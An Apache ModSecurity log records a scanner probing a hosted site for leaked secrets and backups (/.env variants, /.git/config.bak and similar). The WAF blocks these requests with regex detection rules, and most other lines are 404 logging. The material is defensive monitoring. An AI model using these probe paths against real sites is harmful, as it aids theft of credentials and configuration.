[Tue May 26 14:49:49.517941 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu3QAAAPY"]
[Tue May 26 14:49:49.526270 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:54270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.old"] [unique_id "ahVltbEQDDtxJNiDrdTu4wAAAI4"]
[Tue May 26 14:49:49.558098 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu4QAAALM"]
[Tue May 26 14:49:49.609109 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu5gAAALE"]
[Tue May 26 14:49:49.636749 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu6QAAAIU"]
[Tue May 26 14:49:49.712912 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu9QAAAQI"]
[Tue May 26 14:49:49.754590 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:16580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.php"] [unique_id "ahVltbEQDDtxJNiDrdTu-QAAANI"]
[Tue May 26 14:49:49.781672 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:54308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.swp"] [unique_id "ahVltbEQDDtxJNiDrdTu-wAAAMI"]
[Tue May 26 14:49:49.849387 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu_wAAAK0"]
[Tue May 26 14:49:49.944971 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvCQAAALg"]
[Tue May 26 14:49:49.945436 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvCAAAAOE"]
[Tue May 26 14:49:49.945464 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvBwAAAPA"]
[Tue May 26 14:49:49.951735 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvDQAAAOo"]
[Tue May 26 14:49:49.956801 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvDwAAAMc"]
[Tue May 26 14:49:50.000222 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvEgAAAJ4"]
[Tue May 26 14:49:50.013747 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:54210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env~"] [unique_id "ahVltrEQDDtxJNiDrdTvGgAAAJ0"]
[Tue May 26 14:49:50.040423 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvFQAAANw"]
[Tue May 26 14:49:50.056136 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTvGAAAAPg"]
[Tue May 26 14:49:50.075865 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvHAAAAOY"]
[Tue May 26 14:49:50.143919 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvIwAAAJA"]
[Tue May 26 14:49:50.144519 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvIQAAAPU"]
[Tue May 26 14:49:50.180918 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvKAAAALA"]
[Tue May 26 14:49:50.189780 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:16600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.old"] [unique_id "ahVltrEQDDtxJNiDrdTvNgAAAMQ"]
[Tue May 26 14:49:50.207219 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvMAAAALE"]
[Tue May 26 14:49:50.225384 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.95:54304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config~"] [unique_id "ahVltrEQDDtxJNiDrdTvNwAAALo"]
[Tue May 26 14:49:50.227402 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvNQAAALI"]
[Tue May 26 14:49:50.351758 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvQAAAAOE"]
[Tue May 26 14:49:50.399060 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvRgAAAOQ"]
[Tue May 26 14:49:50.399653 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvQwAAAJw"]
[Tue May 26 14:49:50.419327 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.bak"] [unique_id "ahVltrEQDDtxJNiDrdTvSgAAANk"]
[Tue May 26 14:49:50.424183 2026] [security2:error] [pid 648203:tid 648393] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvSQAAAME"]
[Tue May 26 14:49:50.575126 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvTwAAAKE"]
[Tue May 26 14:49:50.590531 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvUwAAAO4"]
[Tue May 26 14:49:50.594767 2026] [security2:error] [pid 648203:tid 648459] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvMQAAAQM"]
[Tue May 26 14:49:50.607197 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvVgAAANw"]
[Tue May 26 14:49:50.624555 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvWQAAAKU"]
[Tue May 26 14:49:50.643415 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvXgAAAIs"]
[Tue May 26 14:49:50.644440 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvXwAAAQE"]
[Tue May 26 14:49:50.684301 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvYgAAALU"]
[Tue May 26 14:49:50.703733 2026] [security2:error] [pid 648203:tid 648345] [client 65.111.11.166:18405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVltbEQDDtxJNiDrdTu4gAAAJE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:50.752234 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvaAAAAKQ"]
[Tue May 26 14:49:50.755059 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvawAAAI0"]
[Tue May 26 14:49:50.763052 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvbgAAANM"]
[Tue May 26 14:49:50.783651 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvcQAAANg"]
[Tue May 26 14:49:50.849920 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvdAAAALw"]
[Tue May 26 14:49:50.878271 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvdwAAALI"]
[Tue May 26 14:49:50.920235 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvegAAAJI"]
[Tue May 26 14:49:50.963380 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvgAAAAMc"]
[Tue May 26 14:49:50.964948 2026] [security2:error] [pid 648203:tid 648340] [client 74.249.173.207:27860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVltrEQDDtxJNiDrdTvjAAAAIw"]
[Tue May 26 14:49:50.971380 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvhAAAAJw"]
[Tue May 26 14:49:50.999240 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvhgAAAOA"]
[Tue May 26 14:49:51.020615 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvigAAAMw"]
[Tue May 26 14:49:51.037447 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltrEQDDtxJNiDrdTvkQAAAMA"]
[Tue May 26 14:49:51.089661 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvlAAAAO4"]
[Tue May 26 14:49:51.120637 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvlwAAALM"]
[Tue May 26 14:49:51.148518 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvnAAAAOk"]
[Tue May 26 14:49:51.154733 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvnwAAAM0"]
[Tue May 26 14:49:51.161850 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvowAAAMM"]
[Tue May 26 14:49:51.190437 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvpgAAAQE"]
[Tue May 26 14:49:51.210044 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvqgAAAL0"]
[Tue May 26 14:49:51.225670 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvrwAAAI0"]
[Tue May 26 14:49:51.298759 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvsgAAAJs"]
[Tue May 26 14:49:51.318985 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvtQAAAPU"]
[Tue May 26 14:49:51.320728 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvuAAAAIU"]
[Tue May 26 14:49:51.341816 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvuwAAALw"]
[Tue May 26 14:49:51.389263 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvwgAAAJI"]
[Tue May 26 14:49:51.393080 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvxAAAANo"]
